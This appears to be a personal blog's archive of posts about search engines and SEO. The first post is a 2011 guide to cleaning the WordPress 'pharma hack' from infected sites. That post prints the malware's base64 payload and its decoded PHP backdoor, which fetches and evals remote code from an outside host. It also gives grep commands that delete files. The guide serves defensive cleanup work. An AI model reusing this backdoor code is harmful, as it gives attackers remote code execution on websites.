Current Location: Home / Archives for Search Engines

Removing WordPress Pharma Hack

July 11, 2011 By 2 Comments

I posted a few weeks ago about the WordPress Pharma Hack that has been running pretty rampant across the web, in case you missed my initial post, here’s a link. Well, I would like to say that we were able to jump right on this thing and immediately remove it pretty easily, but that simply wasn’t the case. I worked closely w/ Matt Critcher, our server admin at Pleth, LLC, and probably one of the sharpest guys I know, and we toiled over this thing daily for about a week or so until we finally eradicated it from all of our WordPress installations. For the benefit of all of you that are still wrestling w/ this hack, here’s exactly how we removed it…

Locate all base64_decode

This hack, like a lot of others, used base64 code to disguise JavaScript (so we have to locate it and remove it, this is what it will look like)

< ? php $XZKsyG=’as’;$RqoaUO=’e';$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t';$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY.......and so on...

To locate and remove the code, you will need to SSH into your server, CD into the wordpress home directory and do the following

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}' | xargs -I{} rm -v {}

This will scan the entire folder and all it’s sub-directories for any file containing the string “php $RANDOMLETTERS=’as’” and delete it verbosely. If you do not wish to delete it automatically just run this to print out the filename.

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}'

When we did this, there were about 50 files that contained the exploit.  There are other files containing nasty code as well. You will also need to to search for and remove files containing the string “wp_class_support”.

grep -r wp_class_support * |awk -F : '{print $1}' |xargs -I{} rm -v {}

This bit of syntax will search for files with that string and delete them (if you want to manually delete them, leave off the xargs part as per the above example).

I also found this nasty thing (not sure if it is related to the Pharma Hack) in several files. All were WordPress core files, so you MUST replace every WordPress file on your site with clean ones. DO NOT do this via the internal utility – use FTP, SCP, or whatever to get these files uploaded. Once you have done this, do

grep -r QGluaV9yZXN0b * |awk -F : '{print $1}'

This will search the remaining files for the exploit. Any files containing this MUST be replaced or you are still infected. The full text of the exploit the base64 encoded string as follows:

QGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTtAaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpO0BpbmlfcmVzdG9yZSgic2Fm
ZV9tb2RlX2luY2x1ZGVfZGlyIik7QGluaV9yZXN0b3JlKCJzYWZlX21vZGVfZXhlY19kaXIiKTtAaW5pX3Jlc3RvcmUoImRp
c2FibGVfZnVuY3Rpb25zIik7QGluaV9yZXN0b3JlKCJhbGxvd191cmxfZm9wZW4iKTsNCmlmKEBmdW5jdGlvbl9leGlzdHMo
J2luaV9zZXQnKSkNCntAaW5pX3NldCgnZXJyb3JfbG9nJyxOVUxMKTsgQGluaV9zZXQoJ2xvZ19lcnJvcnMnLDApOyBAaW5p
X3NldCgnZmlsZV91cGxvYWRzJywxKTsgQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsMSk7fQ0KZWxzZXtAaW5pX2FsdGVy
KCdlcnJvcl9sb2cnLE5VTEwpOyBAaW5pX2FsdGVyKCdsb2dfZXJyb3JzJywwKTsgQGluaV9hbHRlcignZmlsZV91cGxvYWRz
JywxKTsgQGluaV9hbHRlcignYWxsb3dfdXJsX2ZvcGVuJywxKTt9DQpmdW5jdGlvbiBHZXRTaGVsbENvbnRlbnQoJGhvc3Qs
JHVybCl7aWYoQGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpeyRmdWxsX3VybD0naHR0cDovLycuJGhvc3QuJy8nLiR1
cmw7JGN1cmw9Y3VybF9pbml0KCk7Y3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9VUkwsJGZ1bGxfdXJsKTtjdXJsX3NldG9w
dCgkY3VybCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLHRydWUpO2N1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfSEVBREVSLGZh
bHNlKTtjdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDEwKTtjdXJsX3NldG9wdCgkY3VybCxDVVJM
T1BUX1VTRVJBR0VOVCwnTW96aWxsYS80LjAnKTskZGF0YT1AY3VybF9leGVjKCRjdXJsKTtjdXJsX2Nsb3NlKCRjdXJsKTty
ZXR1cm4gJGRhdGE7fWVsc2VpZihAZnVuY3Rpb25fZXhpc3RzKCdmc29ja29wZW4nKSl7JGZwPUBmc29ja29wZW4oJGhvc3Qs
ODAsJGVycm5vLCRlcnJzdHIsMTApO2lmKCRmcCl7JG91dD0iR0VUIC8kdXJsIi4iIEhUVFAvMS4wXHJcbiI7JG91dCAuPSJI
b3N0OiAkaG9zdFxyXG4iOyRvdXQgLj0iVXNlci1BZ2VudDogTW96aWxsYS80LjBcclxuIjskb3V0IC49IkNvbm5lY3Rpb246
IENsb3NlXHJcblxyXG4iO0Bmd3JpdGUoJGZwLCRvdXQpO3doaWxlKCRhbnNbXT1mZ2V0cygkZnApKTtmY2xvc2UoJGZwKTsk
YW5zPXRyaW0oaW1wbG9kZSgnJywkYW5zKSk7JGRhdGE9KHRyaW0oc3Vic3RyKCRhbnMsc3RycG9zKCRhbnMsIlxyXG5cclxu
IikpKSk7cmV0dXJuICRkYXRhO319ZWxzZWlmKEBmdW5jdGlvbl9leGlzdHMoJ2ZpbGVfZ2V0X2NvbnRlbnRzJykgJiYgQGlu
aV9nZXQoJ2FsbG93X3VybF9mb3BlbicpPT0xKXskZnVsbF91cmw9J2h0dHA6Ly8nLiRob3N0LicvJy4kdXJsOyRkYXRhPUBm
aWxlX2dldF9jb250ZW50cygkZnVsbF91cmwpO3JldHVybiAkZGF0YTt9fQ0KaWYoJF9SRVFVRVNUWydzaCddICE9ICIiKSB7
ZXZhbChiYXNlNjRfZGVjb2RlKEdldFNoZWxsQ29udGVudCgiXHg3M1x4NjVceDZmXHg3NFx4NmZceDZmXHg3M1x4MmVceDYz
XHg2Zlx4NmQiLCJzL2kucGhwPyIuJF9SRVFVRVNUWydzaCddLiImaG9zdD0iLnVybGVuY29kZSgkX1NFUlZFUlsnU0VSVkVS
X05BTUUnXSkuIiZ1cmw9Ii51cmxlbmNvZGUoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKSkpO2V4aXQ7fQ==

Which decodes as

@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{@ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);}else{@ini_alter('error_log',NULL); @ini_alter('log_errors',0);
@ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1);}
function GetShellContent($host,$url){if(@function_exists('curl_init'))
{$full_url='http://'.$host.'/'.$url;$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$full_url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_HEADER,false);curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0');$data=@curl_exec($curl);
curl_close($curl);return $data;}elseif(@function_exists('fsockopen'))
{$fp=@fsockopen($host,80,$errno,$errstr,10);
if($fp){$out="GET /$url"." HTTP/1.0\r\n";$out .="Host: $host\r\n";
$out .="User-Agent: Mozilla/4.0\r\n";$out .="Connection: Close\r\n\r\n";
@fwrite($fp,$out);while($ans[]=fgets($fp));fclose($fp);$ans=trim(implode('',$ans));
$data=(trim(substr($ans,strpos($ans,"\r\n\r\n"))));
return $data;}}elseif(@function_exists('file_get_contents') && @ini_get('allow_url_fopen')==1)
{$full_url='http://'.$host.'/'.$url;$data=@file_get_contents($full_url);return $data;}}
if($_REQUEST['sh'] != "")
{eval(base64_decode(GetShellContent("\x73\x65\x6f\x74\x6f\x6f\x73\x2e\x63\x6f\x6d","s/i.php?"
.$_REQUEST['sh']."&host=".urlencode($_SERVER['SERVER_NAME'])."&url=".urlencode
($_SERVER['REQUEST_URI']))));exit;}

I went ahead and scanned the whole site for files that had base64_decodes in them. To search for these do the following:

grep -r base64 * |awk -F : '{print $1}' |sort |uniq

This will print out a list of each file that contains the string “base64″. You should examine each file carefully for rouge content, as many files legitimately contain this string and need it to function. If you are unsure of the code, replace the file with a fresh copy. Most of the files I’ve seen that are infected have the base64 statement at the very top of the file but this is not always the case.

Once you get the files cleaned, you need to work on the database. The exploit adds and/or modifies entries in the wp_options table. Using the MySQL interpreter or phpMyAdmin run the following query:

SELECT * FROM `wp_options` where `option_name` LIKE 'rss%' ORDER BY `wp_options`.`option_name` ASC;

This will search the wp_options table for all entries beginning with rss_ and return them. You will need to delete each one that looks similar to this:

rss_552afe0001e673901a9f2caebdd3141d

rss_ followed by strings of random numbers or letters is bad and MUST be deleted as they are added by the exploit. Also, the exploit adds or modifies several other records in the same table. A couple of the sites we found recommended running this query as well as these options should not be set or contain any data:

delete from wp_options where option_name = "class_generic_support";
delete from wp_options where option_name = "widget_generic_support";
delete from wp_options where option_name = "fwp’";
delete from wp_options where option_name = "wp_check_hash";
delete from wp_options where option_name = "ftp_credentials";

—————————————————————-

If all goes well, this information should help you eradicate the WordPress Pharma Hack from your wordpress installation. For a more detailed post on how to remove this hack, I highly recommend Matt Critcher’s post on his blog…

 

Filed Under: Search Engines, Web Development, Web Hosting, Wordpress™ Tagged With: , ,

The WordPress Pharma Hack

June 16, 2011 By 1 Comment

Today I received an alert that one of our websites was reported by Google as being the victim of hacking and was being flagged as possibly dangerous in their search results. This immediately caught me off guard because our server admin, Matt Critcher, is one of the best in the business and nothing gets past this guy. We have several years of research and development and no telling how much cash invested in the security of our hosting environment. Granted, securing a server is something you have to work at just about everyday to eliminate new threats as they arise, and believe me, we take security very seriously.

Upon receiving this notification I immediately logged into the website that had been flagged and started looking for anything out of the ordinary. I was able to immediately eliminate most of the usual list of characters you see w/ open-source software attacks such as defaced pages or redirection scripting. I kept digging around and finally got on Skype w/ Matt to see if he had seen anything out of the ordinary from his end. We did some investigating and discovered that the hack itself wasn’t something that we could actually see on the website itself, but instead, it showed up in the Google search results for that website. In all of my years developing websites I can honestly say that I have never seen a hack quite like this before.

I did a little research and quickly stumbled upon this article on pearsonified.com discussing the “pharma hack” on websites running WordPress, they too had in fact fallen victim to this exploit and offered up some great information on how to diagnose the hack and furthermore how to eliminate it from your WordPress installations (which is somewhat tedious to do). I also ran across an awesome tool for scanning your website by Securi that is hosted online at this location. A few hours later Matt had already rid our servers of this exploit but not before we had discovered it in a few other locations, including this website. See screengrab of Google results at the bottom of this post.

Keep in mind that we keep a very close eye on all of our software installations and perform frequent updates to insure we have the latest versions of every application running. Somehow this sneaky hack found it’s way into our ecosystem, and quite honestly that’s an accomplishment on whoever launched this exploits part. I spoke to a friend this afternoon who also has a web hosting company and he had just learned that several of his clients were reporting inaccurate Google search results for their websites as well.

The questions I have at this point pertain to how in the world something like this could happen. I hope to learn more over the course of the next few days and will report back anything I should run across. In the meantime, it might not be a bad idea if you run WordPress to do a quite Google search for your website by entering in [site:www.yourdomain.com] to see if you have any weird page titles or meta information showing up, or give the Securi scanner a try to see if it can locate any problems you might not be aware of. Just glancing at a website page titles by browsing the site won’t work, everything looks normal.

Filed Under: Search Engines, Web Hosting, Wordpress™ Tagged With: , ,

EP:009 – The Cotton Club Podcast

May 13, 2010 By Leave a Comment

Just wrapped up another episode of The Cotton Club Podcast tonight w/ guest hosts Brant Collins and Robert Blake.  The topic for discussion for this evenings show was SEO, or search engine optimization.  I have actually gotten a lot of requests from people to do a show on this topic so hopefully we did a good enough job explaining our viewpoints without confusing everyone.

On the show we discuss some popular misconceptions regarding SEO as well as some standard practices that we all put into our clients projects for SEO.  We also discussed which search engines you should worry about, and what market share the big SE’s have at this time.

Brant and Robert also shared some findings from a few of their own personal analytics reports to help give us some insight as to what they are seeing and we also touched on what impact social media saturation can have on a websites traffic.  We also discussed quality versus quantity in terms of traffic analytics.  If you own a website and would like to maximize your search engine rankings, you should definitely check out this episode.

To wrap up the show we each talked about our favorite iPhone apps of the week.  Robert mentioned a game he has been playing called Angry Birds, Brant mentioned an augmented reality browser app called Layar that sounds pretty interesting, and I shared an app called Wind Meter that uses your phone to measure wind speed.

As always, thanks for listening and if you have any questions or topics you would like to see us address on the show be sure to drop me a line at: cotton.rohrscheib@pleth.com and I will be happy to consider it.

EP009-TheCottonClub [ 37:25 ] Play Now | Play in Popup
Filed Under: Podcasts, Search Engines Tagged With: , , , , , , , ,

My Google Search Story

April 9, 2010 By Leave a Comment

I ran across this on Robert Blake’s Tumblr page and thought it was pretty cool so I created one myself.  This reminds me a lot of the television ad Google ran during the Super Bowl, it might be the exact same thing, I was too pissed about the Colts losing to remember much else.

Filed Under: Miscellaneous, Search Engines

Checkout the O’Reilly Answers Social Network

November 4, 2009 By 2 Comments

Image2 I am typically not one to recommend a social network to my clients w/ the exception, of course, of the already established networks such as Facebook, Twitter, LinkedIn, Tumblr, etc.  My whole philosophy regarding social networking at this stage of the game is that if you want to build a community, build upon what’s already out there as much as possible (Facebook API, Twitter API) and don’t try to re-invent the wheel. 

However, I have always felt that strong, reputable Niche networks could exist externally if they were packaged correctly.  A good example of such a network that is currently in Beta right now is O’Reilly Answers.  O’Reilly has a good vision with this network, and of course they have some really positive things in their favor already such as Awesome Reputation, an Established Following, and a Trusted Name, what more could you ask for?

You can also look at the Network and tell that there were some clear objectives put into place while developing this solution.  They obviously wanted it to be user friendly, functional, and interactive.  There are basically three ways you can interact inside O’Reilly Answers:

Share Your Knowledge    

You can actually enter in blog posts and tag them according to your subject matter and other users can comment you on your posts.  This is one area that I think they could have done a little differently.  We all manage our own blogs externally, why would we want to post our content on their website as well and have 2 comment systems running at the same time to follow up w/ readers?  My thoughts on this part are that they could have put into place some sort of RSS option where you could aggregate your content from your blog and have your friends inside the network click out to read your posts.  Maybe I am not seeing the big picture on this, but as a workaround I posted about 3/4 of 2 blog posts into their network along w/ a link at the bottom to get to the remainder of my post on my blog.

Ask A Question

Since O’Reilly has been catering to the Technically Minded community for so long, you can rest assured that some pretty sharp folks are going to be hanging around in this community.  Well, let’s say you have a question about a project you are working on, you can post that question to the community, tag it, and before you know it some of the sharpest minds in the world are answering your question.  This is an area where I really see this network having value for a lot of us…

Answer a Question

Let’s say someone asks a question and you know the answer, you can provide them w/ your insight w/ ease.  I think that this networking model is going to speed up the “obstacle to solution process” once the network get’s off the ground.

———————————————-

Also, just a few notes regarding the Network as it is right now.  There are obviously some bugs, I had a couple of errors pop up on me when I was setting up my profile, this is to be expected w/ a new release like this.  Give them time, I am sure that O’Reilly will iron out all of the kinks very soon.  Here’s some basic information that was forwarded to me today from our Account Rep at O’Reilly…

We’re launching the beta of O’Reilly Answers, and I’m inviting you to be part of it. In brief, O’Reilly Answers is a community site for sharing knowledge, asking questions, and providing answers that brings together our customers, authors, editors, conference speakers, and Foo (Friends of O’Reilly).

Why Answers, and why now?
O’Reilly is at the center of an amazing exchange of knowledge sharing and idea generation. We’ve created the usual means of facilitating communication between customers, O’Reilly folks, and the outside experts we call "alpha geeks" who contribute to O’Reilly books, conferences, and websites. We can connect through reader reviews, errata submissions, book forums, blog comments, Get Satisfaction, our customer service department, and more. But too much of this conversation is siloed, and not enough is public (e.g., discussions on our internal mailing list for editors, or personal responses to customer questions). O’Reilly Answers will be the place where much of that communication happens from this point forward.

Why participate?
The lofty reason: Like O’Reilly, you want to "change the world by spreading the knowledge of innovators." That’s our mission, and we’ve been fortunate enough to build a community of passionate, committed people who love to learn and share their knowledge as they work towards a better world for us all.

The "nice, but what’s in it for me" reasons: reputation, recognition, and rewards.

Get Recognized: "Find interesting people" is a core activity at O’Reilly, and an important component of our success. We see Answers as an important way to discover and connect with our next authors, online instructors, videographers, and speakers.

Build Your Reputation: You’ve learned a lot, why not get credit for all that knowledge? As your submissions to Answers are voted up, your personal reputation on the site increases. At launch, your reputation will be based solely on your participation in O’Reilly Answers. Soon, we’re expanding across oreilly.com, so the book errata and book reviews you’ve submitted, books you’ve registered, and conferences you’ve attended, will add reputation points. You’ll also earn badges to mark accomplishments and milestones.

Earn Rewards: Glory is great, but discounts and deals are nice, too. We want to reward your contributions to the O’Reilly community. Shortly we’ll have a point-based system in place that you can redeem for books, training, courses, and conferences. Details soon, but in the meantime, any actions you take now will count towards your total points.

This is just v.1: The best part of any project on the web is watching it take on a life of its own. With that in mind, we’re looking forward to *your* suggestions about where O’Reilly Answers should go, what features should be added, and what benefits and rewards we can offer all of you.

I’d like to acknowledge the projects that have proceeded Answers and inspired us, such as SitePoint Forums (we distribute their books), StackOverflow, Yahoo! Answers, Knol, and many others. They’re great resources, and we think the O’Reilly community can create a useful site that’s, well, a different kind of animal.

One last thing: O’Reilly Answers is in beta and you may encounter bugs. We’re still working on many improvements to the site, such as feeds for each tag, but would love to hear your suggestions for features and improvements. Please send any suggestions/questions/bug reports to answers@oreilly.com.

Until next time–
Marsee Henon

Also, if you should signup, be sure to add me as a friend, http://people.oreilly.com/cotton

Filed Under: Apache, Book Reviews, Central Arkansas Refresh, Domain Registration, E-Commerce, Email Solutions, MODx CMS, Monetization, Search Engines, Social Media / Web 2.0, Web Development, Web Hosting, Wireless, Wordpress™ Tagged With: , , , , , , , ,

How Bing Will Rank Your Tweets

October 27, 2009 By Leave a Comment

I blogged a few days ago about Microsoft Bing and Google’s announcement that they were both going to start incorporating our Tweets into their search results.  There has been a lot of speculation as to how these Tweets are gong to show up in their search results. I have been following all of this pretty closely as it is going to directly impact our industry. I blogged earlier today about how Google’s new Social Search is going to work but I think Bing might be a slightly different animal…

Apparently Bing is going to weigh tweets according to follower counts.  For instance, if you and I both tweet similar things, and I have 1000+ followers and you have 300 followers, my tweet is going to have a higher ranking.  Granted, this is not the best method imaginable, but for the time being I think that is how it’s going to be.  Of course, these search algorithm’s get tweaked a lot and all of this is subject to change before you even realize it, but that’s the word that I am getting right now.

I think that all of us are anxious to see how Bing and Google both are able to weigh what’s good content versus what’s bad content using only 140 characters…

Filed Under: Search Engines, Social Media / Web 2.0 Tagged With: , ,

How Google’s Social Search Works

October 27, 2009 By 3 Comments

google-labs-logo Google announced their new Social Search product this week on their blog.  Google Social Search is still in the experimental phase but it looks promising. Once you factor in Facebook, Twitter, FriendFeed, and a Blog, most of us publish a lot of content.  Some of this information can be useful to others, and even though they are connected to you socially (Facebook, Twitter, etc.) and subscribe to your blog, they currently aren’t able to pull up this information very quickly. In the case of a web search, it’s highly unlikely your posts are going to show up on the first page for whatever topic they are looking for, but this is where Google Social Search is going to come in handy. 

Here’s a scenario where this could be pretty helpful.  Let’s say I have dinner at a great Mexican Restaurant in Little Rock and I post a note to Twitter raving about the food.  Let’s also say that a few of the people who follow me on Twitter reply to me with favorable reviews of their own.  Follow me so far?  Okay, let’s also say that 2 months later one of my friends is thinking about trying this restaurant but hasn’t talked to anyone who has been.  He does a quick Google Search for the Restaurant to see some reviews and my Tweet shows up in his search results!  Since he knows me as a trusted source, knowing first hand that I have excellent taste when it comes to food, a good review from me is going to trump any review website that he would have ordinarily based his decision on…

Here’s a better description from the Google Blog as to how the social search feature is going to come in handy:

Your friends and contacts are a key part of your life online. Most people on the web today make social connections and publish web content in many different ways, including blogs, status updates and tweets. This translates to a public social web of content that has special relevance to each person. Unfortunately, that information isn’t always very easy to find in one simple place. That’s why today we’re rolling out a new experiment on Google Labs called Google Social Search that helps you find more relevant public content from your broader social circle. It should be available for everyone to try by the end of the day, so be sure to check back.

A lot of people write about New York, so if I do a search for [new york] on Google, my best friend’s New York blog probably isn’t going to show up on the first page of my results. Probably what I’ll find are some well-known and official sites. We’ve taken steps to improve the relevance of our search results with personalization, but today’s launch takes that one step further. With Social Search, Google finds relevant public content from your friends and contacts and highlights it for you at the bottom of your search results. When I do a simple query for [new york], Google Social Search includes my friend’s blog on the results page under the heading "Results from people in your social circle for New York." I can also filter my results to see only content from my social circle by clicking "Show options" on the results page and clicking "Social."   Here’s a good video demonstration of Google’s Social Search:

All the information that appears as part of Google Social Search is published publicly on the web — you can find it without Social Search if you really want to. What we’ve done is surface that content together in one single place to make your results more relevant. The way we do it is by building a social circle of your friends and contacts using the connections linked from your public Google profile, such as the people you’re following on Twitter or FriendFeed. The results are specific to you, so you need to be signed in to your Google Account to use Social Search. If you use Gmail, we’ll also include your chat buddies and contacts in your friends, family, and coworkers groups. And if you use Google Reader, we’ll include some websites from your subscriptions as part of your social search results.

To learn more about how Social Search works behind the scenes, including the choices and control you have over the content you see and share, read our help center article or watch this video:

This feature is an experiment, but we’ve been using it at Google and the results have been exciting. We’d love to hear your feedback. Oh, and don’t forget to create a public Google profile to expand your social circle and more easily find the information you’re looking for (including that New York blog).

If you are interested in testing the Google Social Search Experiment, click here.
Official Google Blog: Introducing Google Social Search: I finally found my friend’s New York blog!

Filed Under: Search Engines, Social Media / Web 2.0 Tagged With: , ,

Be Careful What You Say on Facebook & Twitter

October 22, 2009 By 3 Comments

In case you haven’t heard this already, Google and Microsoft (Bing) both announced that they will be displaying tweets from Twitter and status messages from Facebook in their search results.  Now for the most part I know that most of us already exercise caution in what we put out there, but I honestly believe that there are going to be a few “less cautious” people that are going to be caught off guard when all of this comes to fruition.  You probably know exactly what I am talking about too, it’s not just the expletives and profanity, but I think that element is going to be the most fun to watch and read about.

For as long as I have been working in this industry, I have always worked under the assumption that anything I put out there is going to live forever.  I also try to keep in mind that there could come a day where my clients or my mom might actually read my tweets or blog posts.  I think that a lot of us in this business long enough already know this, but I am concerned as to whether everyone has come to this realization yet…

Your Social Brand Reputation is More Important than Ever!!

Honestly though, I think that the biggest result that we will see from the search engines incorporating these “social nuggets” into their search results is going to be even more emphasis placed on social media by corporations.  Especially in the realm of customer service and dispute resolutions.  I think that companies will realize quickly that their customers bad experiences are showing up in Google and Bing (CEO’s and Marketing / PR People are always googling themselves and their companies in their spare time, after all the perception falls broadly on their shoulders). 

One recent situation came up with a friend of mine who had his luggage lost by one of the major airlines and it took a few days for him to get the airlines to work with him.  This all played out on Twitter, and for the most part I think all of Central Arkansas heard about it (and rightfully so, good for him! I even retweeted him a few times myself).  Granted, the airlines that I am referring to already has a Twitter account, but I think they could have jumped on this opportunity and handled it better and more efficiently than they did.  Well, take this into consideration, not only is this bad experience going to live forever inside of Twitter, but now it’s also going to be archived w/ two of the most widely used search engines in the world. 

In case you missed what I was trying to say through all of this, here it is in the nutshell; Your brand’s social reputation was already important, but now it’s a lot more important than you can imagine!!  I recently did a presentation related to this topic, you can find that here along w/ my slides…

How’s All of This Going to Be Rolled Out?

Honestly I don’t have all of the details.  I do know that each of the search engines are probably going to have their own policies for including peoples social content.  I suspect it will be some sort of opt-in model, but that’s probably still up in the air right now.  I also envision the social networks themselves adding another layer to this equation, probably an opt-in model in this case as well.  You will likely see a checkbox in Facebook and Twitter that will say something like, “include my status updates in search engines” or something along those lines.

My Prediction for Facebook and Twitter

I honestly don’t think Twitter is going to have near as many concerns going into this model that Facebook is going to see.  For the most part I don’t think that Twitter users look at Twitter with the same concerns that they do Facebook.  I think Facebook users think that they have a lot more invested in Facebook (20 year old school yearbook photos, baby pictures, vacation photos, relationship statuses, etc.).  All of this to say that I think Facebook users are going to be a lot more guarded on this issue once they figure out what’s going on.  You just thought the Facebook terms of service issue was a biggie, wait until someone’s inappropriate status update shows up in Google underneath their employer’s listing… Whew!!

My Predictions for Google and Microsoft (Bing)

I think that both of these search engines are going to see some positives for adding this content to their search results.  I am anxious to see how it is presented, I have some ideas as to how they could do this if anyone from either of these companies wants to give me a shout…

I also think that by doing this that search engines in general are become even more useful and relevant than they were before.  Unless of course, you are looking for Kanye West’s concert dates, they are going to located on page 100 or so, tucked neatly behind all of the “you suck” tweets he got after the VMA’s.

More on this Topic:

There has been a lot of coverage since these announcements were made but there are a couple that I recommend checking out, Dan Zarella actually saw this in his crystal ball, and PC World did a nice piece on this story here.  I also like Web Worker Daily, they covered this story here…

What Are Your Thoughts?

I would be interested as to what some of you are thinking on this topic, hit me back or leave me a comment and let me know…

Filed Under: Search Engines, Social Media / Web 2.0 Tagged With: , , , ,

Great Blog Content –vs- SEO

September 26, 2009 By 5 Comments

A while back I did a post on Social Saturation and Search Engine Optimization, in that post I emphasized how important it is to get your content onto the social networks.  I was reading a post today by Dawn Foster at Web Worker Daily and she brought up some points that I also agree with and I wanted to share it w/ you. 

In her post she mentioned a discussion panel that she was a part of where there were 2 content people and 2 seo people that do seo full time.  She hit a home run in the first few sentences on this post and I could not agree with her more:

This weekend I was on an “SEO Smackdown” panel at our local WordCamp Portland. Two of us were from the content side, while the other two panelists were SEO experts. My take on SEO is that writing compelling, interesting blog content that people will want to talk about and link to will get you around 95 percent of the way to good search engine rankings. If you don’t have great content, SEO is not going to be very useful for you. You might be able to do some SEO trickery to get people to your web site, but if they aren’t impressed by the content when they arrive, they won’t stick around long enough to have any impact.

Now, I want to emphasize that I am not advocating abandoning SEO, there are some basic principles that you should adhere to, you can find some of my thoughts on SEO in a post I did a while back, that’s not what this post is about though.  You should pay attention to key things such as page titles, descriptions, etc., but you should do that on everything you publish to the web.  Much more than that though, you need to focus on your content.  Here are some valid points that Dawn brought out in her article…

Write Great Titles

Keep in mind that you are writing titles for human beings, so your title should be catchy and convey the meaning of the post as a first priority. While you write the title, you should also be thinking about the keywords that people might want to use to find your content and make sure that you have included a keyword or two in the title. I’ll illustrate this with a couple of examples of good and bad titles.

  • Bad: Dawn’s Thoughts for March
  • Better: Analysis of Facebook and Twitter Demographics in March
  • Bad: Day 1 of LinuxCon
  • Better: Mobile Linux and Open Standards on Day 1 of LinuxCon

Write New and Interesting Content

Write content that people will want to link to and discuss. If you are rehashing the same stories as every other blogger, people are much less likely to read and respond to your content. Write posts that are new, fresh and unique with analysis and insight from your unique background and perspective. You can talk about a news story that other people are blogging about, but spend some time writing about your experiences and ideas that offer a different perspective than the rest of the crowd. Use research in new ways, interview interesting people, and talk about your experiences. By offering something new, people are much more likely to read your blog post and link to it, which is where the real SEO magic is found.

Include Personal Anecdotes

Nothing makes a post unique quite like personal anecdotes based on your experiences. I saw this first-hand when I started writing for WebWorkerDaily. I wrote what I thought was a brilliant post on using Yahoo Pipes and then I wrote a short, quick post about how I dread answering the question, “So, What Do You Do?” during the holidays when talking to non-technical family and friends. The “brilliant” post got a few comments and some traffic, but nothing like the short, personal story about how to answer that difficult question. Human beings read our blog posts, and personal stories resonate with people in a way that technical facts and figures never will.

I just thought that this was very good information and thought that I would share it w/ my readers.  Of course, if you work in this industry you well know that getting clients to write content is a lot like pulling teeth, but the ones that do put forth the effort usually see the results from it.

Filed Under: Miscellaneous, Search Engines, Social Media / Web 2.0 Tagged With: , , ,

Good Social Saturation -vs- Organic SEO

August 5, 2009 By 11 Comments

A lot of times when my partners and I are speaking with a new client about a project they will always list “Good Search Engine Placement” at the top of their priority list.  This has been the case for as long as I can remember, and for good reason.  If a website doesn’t pull up well in the search engines it means that the website owner is going to have to spend that much more money on targeted PPC campaigns just to drive enough traffic to their website for them to break even.  With me so far? I did a post last month citing an article found on Yahoo discussing how people spend their time online, I only see this trend improving…

In last month’s blog post I mentioned that since social networking sites like MySpace, Facebook, and Twitter have caught on in popularity there has been a sharp trend in how people spend their time on the internet.  There have been a lot of studies performed, but for me the biggest indicator is my log files and traffic analytics.  People aren’t using Google to find my content as much as they are Twitter and Facebook.  Now, I am going to say for the record that by no means am I implying that website owners should abandon or neglect their SEO practices, I am just saying that there should probably be a lot more emphasis put on social media saturation.

By Social Media Saturation, my own terminology for promoting content inside social networks, I am talking about putting your content onto the social networks like Twitter, Facebook, and even MySpace if possible.  My most recent log files show me a lot of interesting things in regards to how my content is discovered.  For instance, my number one referrer is Twitter, and my second referrer is Facebook.  Google comes in a close third just below Facebook in terms of referring traffic to my blog.

Okay, so how do you get your content into these social networks?  That’s where a company like Pleth can help you out.  We will often tie our clients RSS feeds into Twitter and Facebook so their content is automatically sent into these networks.  Now, there is a fine line as to what is appropriate to send inside these networks, and there is also such thing as overkill.  You don’t want to have friends or followers unfollow you just as soon as you get them.

If you are interested in learning more about how you can penetrate the social media landscape with content from your business website, please don’t hesitate to contact us to discuss your project.

Filed Under: Search Engines, Social Media / Web 2.0 Tagged With: , , ,
« Older Posts